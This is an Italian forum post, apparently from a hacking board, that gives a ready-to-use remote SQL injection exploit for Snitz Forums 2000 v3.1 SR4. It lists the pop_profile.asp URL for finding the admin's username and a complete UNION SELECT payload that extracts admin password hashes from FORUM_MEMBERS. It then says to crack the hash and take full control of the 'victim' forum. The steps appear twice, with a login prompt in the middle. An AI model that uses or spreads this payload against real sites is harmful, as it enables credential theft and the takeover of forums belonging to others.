Un exploit powered by XORON, una Remote SQL Injection Vulnerability per i Forum SNITZ 2000 v3.1 SR4.
Il funzionamento è semplcissimo, la vulnerabilità è nella pagina pop_profile.asp:
trovare l’username dell’Admin:
aggiungere all’indirizzo del forum vittima pop_profile.asp?mode=display&id=1
esempio:
vi comparirà il nick dell’Admin;
trovare la password dell’Admin:
aggiungere all’indirizzo del forum vittima pop_profile.asp?
mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9
,10,11,12,13,14,15,16,17,18,19,20,21,
22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS
Ecco che compare l’hash MD5 della password, adesso basta crackarla con il cracker di milw0rm.
Voilà avete il pieno controllo del Forum!
Bye Bye
Il funzionamento è semplcissimo, la vulnerabilità è nella pagina pop_profile.asp:
trovare l’username dell’Admin:
aggiungere all’indirizzo del forum vittima pop_profile.asp?mode=display&id=1
esempio:
Perfavore,
Entra
oppure
Registrati
per vedere i Link!
vi comparirà il nick dell’Admin;
trovare la password dell’Admin:
aggiungere all’indirizzo del forum vittima pop_profile.asp?
mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9
,10,11,12,13,14,15,16,17,18,19,20,21,
22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS
Ecco che compare l’hash MD5 della password, adesso basta crackarla con il cracker di milw0rm.
Voilà avete il pieno controllo del Forum!
Bye Bye
